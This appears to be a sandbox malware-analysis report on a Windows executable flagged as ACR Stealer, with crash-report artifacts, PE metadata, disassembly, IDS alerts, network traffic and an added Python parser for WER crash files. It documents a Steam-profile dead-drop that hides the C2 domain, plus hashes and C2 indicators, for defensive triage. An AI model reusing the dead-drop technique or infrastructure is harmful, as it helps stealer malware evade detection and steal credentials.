This is the Report.wer that WerFault.exe writes for the crashed process. Two fields matter for triage: Wow64Host=34404 (0x8664, AMD64) with Wow64Guest=332 (0x14C, I386) confirms a 32-bit process on the 64-bit host, consistent with the "Uses 32bit PE files" signature; and the second "!"-delimited field of TargetAppId carries the SHA-1 of the crashing binary, 370244669daea5f87c797d6ad240adbfb7006384, which is the sample's SHA1 from the General Information section. The EventTime FILETIME (133801927271995691) converts to 2025-01-01 08:12:07 UTC, matching the timestamp in the minidump header below. On a real host this file survives in the WER ReportQueue/ReportArchive even after the sample is deleted, so it ties a crash to a file hash without the file.
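The Report.wer above is a UTF-16LE key=value file, and the fields an incident responder wants (crashed binary name, its SHA-1 inside TargetAppId, the FILETIME of the crash, the WOW64 host/guest architectures) are easy to extract. The following is an added example written for this page, not Joe Sandbox tooling or part of the original report. The sample bytes are constructed from the decoded preview (the real dropped file continues past TargetAppVer and is not reproduced); the layout of TargetAppId as bucket-hash!0000+SHA-1!name is taken from this report and treated as an assumption rather than a documented format.

```python
"""Parse a WER Report.wer file and extract crash-triage fields.

Added example for this report page; not the sandbox's own code.
"""
from datetime import datetime, timedelta, timezone

# Constructed sample: the Report.wer fields visible in the report preview,
# re-encoded the way WER writes them (UTF-16LE, BOM, CRLF). Not the real file.
_SAMPLE_FIELDS = [
    "Version=1",
    "EventType=BEX",
    "EventTime=133801927271995691",
    "ReportType=2",
    "Consent=1",
    "UploadTime=133801927277151918",
    "ReportStatus=524384",
    "ReportIdentifier=f967174d-e0fb-4f62-a551-ef34d0073e2b",
    "IntegratorReportIdentifier=6e5651ab-5072-40bd-8c42-8de8cf9c78e5",
    "Wow64Host=34404",
    "Wow64Guest=332",
    "NsAppName=OXoeX1Ii3x.exe",
    "AppSessionGuid=0000112c-0001-0014-5647-32d7245cdb01",
    "TargetAppId=W:0006cc2297b958770841dbf2e5a904515b270000ffff"
    "!0000370244669daea5f87c797d6ad240adbfb7006384!OXoeX1Ii3x.exe",
]
SAMPLE_WER = ("\ufeff" + "\r\n".join(_SAMPLE_FIELDS) + "\r\n").encode("utf-16-le")

# IMAGE_FILE_MACHINE_* constants as they appear in decimal in Wow64Host/Wow64Guest.
_MACHINE = {332: "I386", 34404: "AMD64", 43620: "ARM64"}

# 100-nanosecond ticks between 1601-01-01 (FILETIME epoch) and 1970-01-01.
_FILETIME_EPOCH_DELTA = 116444736000000000


def parse_wer(data: bytes) -> dict:
    """Decode a Report.wer blob into a key -> value dict (later keys win)."""
    text = data.decode("utf-16-le").lstrip("\ufeff")
    fields = {}
    for line in text.splitlines():
        if "=" not in line:
            continue  # blank lines or section markers carry no key
        key, _, value = line.partition("=")
        fields[key.strip()] = value
    return fields


def filetime_to_utc(filetime: int) -> datetime:
    """Convert a Windows FILETIME (100ns ticks since 1601) to an aware UTC datetime."""
    micros = (filetime - _FILETIME_EPOCH_DELTA) // 10
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=micros)


def sha1_from_target_app_id(target_app_id: str) -> str:
    """Pull the crashed binary's SHA-1 out of TargetAppId.

    Assumed layout (from this report): W:<bucket hash>!0000<40-hex SHA-1>!<name>.
    """
    parts = target_app_id.split("!")
    if len(parts) != 3 or len(parts[1]) != 44 or not parts[1].startswith("0000"):
        raise ValueError(f"unexpected TargetAppId layout: {target_app_id!r}")
    sha1 = parts[1][4:].lower()
    int(sha1, 16)  # raises ValueError if the field is not hex
    return sha1


def triage(data: bytes) -> dict:
    """Summarise the Report.wer fields an analyst correlates against the sample."""
    f = parse_wer(data)
    return {
        "app": f.get("NsAppName"),
        "event_type": f.get("EventType"),
        "crash_time_utc": filetime_to_utc(int(f["EventTime"])).replace(microsecond=0),
        "host_arch": _MACHINE.get(int(f["Wow64Host"]), f["Wow64Host"]),
        "guest_arch": _MACHINE.get(int(f["Wow64Guest"]), f["Wow64Guest"]),
        "sha1": sha1_from_target_app_id(f["TargetAppId"]),
        "report_id": f.get("ReportIdentifier"),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_WER).items():
        print(f"{key:15} {value}")
```

Run it against a real Report.wer by passing the file's bytes to `triage()`; the returned `sha1` can be matched directly against the sample hash, and `crash_time_utc` against the minidump header, which for the constructed input lands on 2025-01-01 08:12:07 UTC.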
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Wed Jan 1 08:12:07 2025, 0x1205a4 type
Category: dropped
Size (bytes): 125822
Entropy (8bit): 1.8987646251592072
Encrypted: false
SSDEEP: 768:IB3i7abJaCkmy4JG+1aebibaoH6JGlEJ:u3i6nkmxHawIr6klEJ
MD5: CF93D625BE9B3486D4E1715A0CDA1D96
SHA1: CEBABDBCEF76317B8C2C6C346AB87B5D3F5D1100
SHA-256: B9291CF43095FB1DF395607A6F633AAE3790328408A75CCEBA4D834028ED46A5
SHA-512: 00A3585F3952D8CEAF064F77870805522439FB1BA415DB4A04ED891C26D972B321BC3BC6AF50D3847A27C539ED7C44DDCB79C81A7A9E2ACD8F4799BCFB144932
Malicious: false
Reputation: low
This is the minidump WerFault.exe wrote for PID 4396 (the "-p 4396" in its command line above). Its timestamp matches the EventTime in the Report.wer, and because it captures the faulting thread's stack and loaded-module list it is the artifact to open when the run ends in a crash rather than in C2 traffic.
                                                                                                                                                                                          Preview:MDMP..a..... .........tg........................T...........d...hM..........T.......8...........T............N..v...........p"..........\$..............................................................................eJ.......$......GenuineIntel............T.......,.....tg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8378
                                                                                                                                                                                          Entropy (8bit):3.694794779443622
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:R6l7wVeJjia6An6YEIPSUsrgmfw2pqpDQ89b/basfNFjm:R6lXJjf6An6YEgSUsrgmfw9/b5fv6
                                                                                                                                                                                          MD5:0A3FC6D274F764AE602198D343A6D1E5
                                                                                                                                                                                          SHA1:FF2D00A400BDF412BFA8E99993B4E4C7FDA1924A
                                                                                                                                                                                          SHA-256:F0FD7B61AA4A9876E044FB5E5159865E10CAB67CDFDD28105B05CD4476FC3CD4
                                                                                                                                                                                          SHA-512:FE859EBBA787FA69171DD38414A195528D26ED2757CD2B7F5DA94E3035493D7D18BD9676226CC4C579F9388F9C9063805B071C63C6C9D815FD6AFD657E294663
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.9.6.<./.P.i.
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4680
                                                                                                                                                                                          Entropy (8bit):4.460595701421241
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs7Jg77aI9NCbrWpW8VYj4Ym8M4JArLirnFo+q8vWrLirH9m1o30d:uIjfVI76ba7V0JArmrmKWrmrdV30d
                                                                                                                                                                                          MD5:0CCA0F6B9FD8E88EFA38EC167A5902AF
                                                                                                                                                                                          SHA1:86CC23419E21CCE2AEFE4EB55D03A4673442F0C4
                                                                                                                                                                                          SHA-256:E0D449F7DC907617992349D9F98D5C5B0DE4446745D15B8E9F6D498E4E022F99
                                                                                                                                                                                          SHA-512:F83336E97E5E47EC8A8D70AA53D763925A50286260B4393C180366C6DCCFDC8B6E343C766923090CA077F429202C09F558F74B61BC0B6BC56E591EC9E0C80A0B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="656594" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                          Process:C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3188)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):35137
                                                                                                                                                                                          Entropy (8bit):5.372744245762644
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:7fBpqhYGM4evx83TfwtuXNS3F4aXfsW9l+X9hJYFnzOMD5QBdxaXfsW9l+X9hJYH:DB8hYGM4evx83TfwtuX84aXfsW9l+X9c
                                                                                                                                                                                          MD5:1E7DEB0EF5026870E7193ECDE39318E1
                                                                                                                                                                                          SHA1:F0A95CEF0DC52C0C14562031237A677DD764FD7D
                                                                                                                                                                                          SHA-256:58DD9DACBE007647AC9DF7B0C0922014F8752AEB107A1946ABA73236096CABAA
                                                                                                                                                                                          SHA-512:C4E192A4C181BAB9FAD80660ECB4158F8B4DA7A700C8635538CA5C700CB651E64D0415E771108929E6CF9B307EB39CFC6B6085E8C56961843A545BB3811096BB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: 3e3 bGxhbC54eXo=4e4</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cdn=fastly" re
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                          Entropy (8bit):4.421553804709631
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:USvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNE0uhiTw:fvloTMW+EZMM6DFyG03w
                                                                                                                                                                                          MD5:C516BB8D4FE8011115BEE0D5871D400D
                                                                                                                                                                                          SHA1:AF5BD590DFCAE41C7C5EA36F4B8868960569B4AD
                                                                                                                                                                                          SHA-256:AF3843E1AFE6AE292D5E2B1CFD571F1ACAF76D6281EA3BE77E0B87DA497B31EA
                                                                                                                                                                                          SHA-512:7A4DD3D21DB4E8F2AC5A14D5EE262F36C74C314C3372E55BBDC60D1C26734D192996D8527BBDF647466588BAB53B72532140768EBEB2E18440D68202320DD611
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.'E.$\................................................................................................................................................................................................................................................................................................................................................R.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Entropy (8bit):6.544491165544845
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:OXoeX1Ii3x.exe
                                                                                                                                                                                          File size:378'368 bytes
                                                                                                                                                                                          MD5:3e9881b9c6ff4994fc9d684456694e77
                                                                                                                                                                                          SHA1:370244669daea5f87c797d6ad240adbfb7006384
                                                                                                                                                                                          SHA256:a35599ceb0a707d21515a6813b699a86ef0bef98fb42b804274640df2cef4879
                                                                                                                                                                                          SHA512:7b9c266baac07d919376931191ec5ba861ea747cce2a080ddfff3d76067c5125b75618d579db55a3458309743cbe12a75aa76feb1a1a9f5397eed9aa87b0a996
                                                                                                                                                                                          SSDEEP:6144:HSD7bIFLWv34AH9i1Bb5bB3JymF5siEy+GFafYJdWFN+VK:2YQLo1BtWmhEIJovsK
                                                                                                                                                                                          TLSH:29849C32B945E432D16202311F5DDBB5AA7DB1700FB218CBB3E45E6DAEB46C09231F66
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t...t...t.......t......1t.......t..O....t..O....t..O....t.......t...t...t..~....t..~....t..Rich.t..........PE..L...w.Xf...
                                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                                          Entrypoint:0x41d1a0
                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x6658D677 [Thu May 30 19:41:43 2024 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:64cf79ceef6f212e81ad5276c01ae859
                                                                                                                                                                                          Instruction
                                                                                                                                                                                          call 00007FD5C0CBFF15h
                                                                                                                                                                                          jmp 00007FD5C0CBF8CDh
                                                                                                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                          mov dword ptr [ecx+04h], 00446B48h
                                                                                                                                                                                          mov dword ptr [ecx], 00446B40h
                                                                                                                                                                                          ret
                                                                                                                                                                                          push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD5C0CBFA3Fh
push 004572E4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FD5C0CC2B85h
int3
push ebp
mov ebp, esp
and dword ptr [0045A5D8h], 00000000h
sub esp, 24h
or dword ptr [00459084h], 01h
push 0000000Ah
call dword ptr [004460A0h]
test eax, eax
je 00007FD5C0CBFC12h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid                              ; cpuid leaf 0 (eax=0): vendor string returned in ebx:edx:ecx
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h                 ; "Genu"
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h                 ; "ineI"
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh                 ; "ntel"
mov dword ptr [ebp-08h], eax
xor eax, eax
inc eax
push ebx
cpuid                              ; cpuid leaf 1 (eax=1): processor feature flags
mov esi, ebx
pop ebx
nop
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
or eax, dword ptr [ebp-08h]
or eax, edi                        ; eax == 0 only if the vendor string is "GenuineIntel"
mov dword ptr [ebx+04h], esi
mov dword ptr [ebx+08h], ecx
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x57f40          0x8c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5c000          0x37bc        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x513d0          0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x51310          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x46000          0x1a4         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type                             Entropy             Characteristics
.text   0x1000           0x44a0a       0x44c00   8d7060d73bc148599fa8d6329daec2ed  False     0.5540056818181818  data                                  6.635307481318297   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x46000          0x128da       0x12a00   514b84d1c41bc5ae9a4f2bd0b693bec4  False     0.4049522860738255  data                                  4.9965728381036545  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x59000          0x2248        0x1400    71b16004b0d569191cb890591629e3c2  False     0.1845703125        DOS executable (block device driver)  3.3917146849602275  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x5c000          0x37bc        0x3800    3f1d3462bb72b406a84416993d5de400  False     0.7054268973214286  data                                  6.597143871177635   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL           Import
KERNEL32.dll  MultiByteToWideChar, FindFirstFileA, HeapFree, OutputDebugStringA, FindNextFileA, lstrlenA, FindClose, Sleep, GetTempPathA, HeapAlloc, GetProcessHeap, GetNativeSystemInfo, WriteFile, SetFilePointer, CreateFileA, CloseHandle, ExitProcess, TerminateProcess, WaitForSingleObject, OpenProcess, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, GetCurrentProcessId, WideCharToMultiByte, HeapSize, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, ReadConsoleW, GetFileSizeEx, HeapReAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetStringTypeW, InitializeCriticalSectionEx, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, SetEndOfFile, CreateFileW, GetFileType, ReadFile, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, GetCommandLineA, GetCommandLineW, SetStdHandle, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FlushFileBuffers, WriteConsoleW
USER32.dll    FindWindowA
SHELL32.dll   SHGetFolderPathA
WININET.dll   InternetWriteFile
SHLWAPI.dll   PathMatchSpecA
RstrtMgr.DLL  RmGetList, RmRegisterResources, RmStartSession, RmEndSession
Timestamp                        SID      Signature                                            Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2025-01-01T09:12:05.545826+0100  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa  2         192.168.2.5  49704        104.102.49.254  443        TCP
2025-01-01T09:12:06.422346+0100  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa  2         192.168.2.5  49705        188.114.96.3    443        TCP
2025-01-01T09:12:06.422346+0100  2052674  ET MALWARE ACR Stealer CnC Checkin Attempt           1         192.168.2.5  49705        188.114.96.3    443        TCP
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Jan 1, 2025 09:12:04.327714920 CET  61360        53         192.168.2.5  1.1.1.1
Jan 1, 2025 09:12:04.334865093 CET  53           61360      1.1.1.1      192.168.2.5
Jan 1, 2025 09:12:05.686605930 CET  53248        53         192.168.2.5  1.1.1.1
Jan 1, 2025 09:12:05.711291075 CET  53           53248      1.1.1.1      192.168.2.5
Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Jan 1, 2025 09:12:04.327714920 CET  192.168.2.5  1.1.1.1  0x82fb    Standard query (0)  steamcommunity.com  A (IP address)  IN (0x0001)  false
Jan 1, 2025 09:12:05.686605930 CET  192.168.2.5  1.1.1.1  0x8292    Standard query (0)  llal.xyz            A (IP address)  IN (0x0001)  false
Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
Jan 1, 2025 09:12:04.334865093 CET  1.1.1.1    192.168.2.5  0x82fb    No error (0)  steamcommunity.com  -      104.102.49.254  A (IP address)  IN (0x0001)  false
Jan 1, 2025 09:12:05.711291075 CET  1.1.1.1    192.168.2.5  0x8292    No error (0)  llal.xyz            -      188.114.96.3    A (IP address)  IN (0x0001)  false
Jan 1, 2025 09:12:05.711291075 CET  1.1.1.1    192.168.2.5  0x8292    No error (0)  llal.xyz            -      188.114.97.3    A (IP address)  IN (0x0001)  false
• steamcommunity.com
• llal.xyz
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49704        104.102.49.254  443               4396  C:\Users\user\Desktop\OXoeX1Ii3x.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-01 08:12:05 UTC  206                OUT        GET /profiles/76561199619938930 HTTP/1.1
User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
Host: steamcommunity.com
Cache-Control: no-cache
2025-01-01 08:12:05 UTC  1905               IN         HTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Date: Wed, 01 Jan 2025 08:12:05 GMT
                                                                                                                                                                                          Content-Length: 35137
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: sessionid=3a9a3929362069a998b4a6f6; Path=/; Secure; SameSite=None
                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                          2025-01-01 08:12:05 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
